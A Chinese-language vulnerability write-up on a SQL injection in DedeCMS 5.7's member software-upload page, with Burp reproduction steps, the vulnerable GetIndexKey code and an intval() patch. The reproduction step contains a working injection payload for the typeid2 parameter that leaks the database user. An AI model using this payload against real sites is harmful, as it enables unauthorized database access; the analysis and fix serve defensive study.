dedecms /include/helpers/archive.helper.php SQL Injection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

Dedecms会员中心注入漏洞

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-048892

2. 漏洞触发条件

1. 打开http://127.0.0.1/dedecms5.7/member/soft_add.php
2. 添加软件
3. 打开BURP抓包
    1) 将picnum改成typeid2
    2) 然后参数写5',1,1,1,@`'`),('-1','7',user() , '3','1389688643', '1389688643', '8'),(1,2,'

3. 漏洞影响范围
4. 漏洞代码分析

/include/helpers/archive.helper.php

if ( ! function_exists('GetIndexKey')) 
{ 
    function GetIndexKey($arcrank, $typeid, $sortrank=0, $channelid=1, $senddate=0, $mid=1) 
    { 
        //$typeid2来自外部，结合DEDE的本地变量覆盖漏洞即可修改这个变量值
        global $dsql,$senddate,$typeid2;  
        
        if(empty($typeid2)) $typeid2 = 0; 
        if(empty($senddate)) $senddate = time(); 
        if(empty($sortrank)) $sortrank = $senddate;
        
        //$typeid2、$senddate未进行有效过滤就带入SQL查询
        $iquery = "
        INSERT INTO `#@__arctiny` (`arcrank`,`typeid`,`typeid2`,`channel`,`senddate`, `sortrank`, `mid`) 
        VALUES ('$arcrank','$typeid','$typeid2' , '$channelid','$senddate', '$sortrank', '$mid') ";
        
        echo    $iquery;

        $dsql->ExecuteNoneQuery($iquery); 
        $aid = $dsql->GetLastID(); 
        return $aid; 
    } 
}

/archive.helper.php是一个辅助函数库，是存在漏洞的源头，真正的漏洞攻击向量由调用这个文件的GetIndexKey函数触发
/member/soft_add.php

else if($dopost=='save')
{
    $description = '';
    include(DEDEMEMBER.'/inc/archives_check.php');

    //生成文档ID
    $arcID = GetIndexKey($arcrank,$typeid,$sortrank,$channelid,$senddate,$mid);
..

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-048892

5. 防御方法

/include/helpers/archive.helper.php

if ( ! function_exists('GetIndexKey'))
{
    function GetIndexKey($arcrank, $typeid, $sortrank=0, $channelid=1, $senddate=0, $mid=1)
    {
        //$typeid2来自外部，结合DEDE的本地变量覆盖漏洞即可修改这个变量值
        global $dsql,$senddate,$typeid2;
        if(empty($typeid2)) $typeid2 = 0;
        if(empty($senddate)) $senddate = time();
        if(empty($sortrank)) $sortrank = $senddate;
        /* 过滤 */
        $typeid2 = intval($typeid2);
        $senddate = intval($senddate);
        /* */
        $iquery = "
          INSERT INTO `#@__arctiny` (`arcrank`,`typeid`,`typeid2`,`channel`,`senddate`, `sortrank`, `mid`)
          VALUES ('$arcrank','$typeid','$typeid2' , '$channelid','$senddate', '$sortrank', '$mid') ";
        $dsql->ExecuteNoneQuery($iquery);
        $aid = $dsql->GetLastID();
        return $aid;
    }
}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved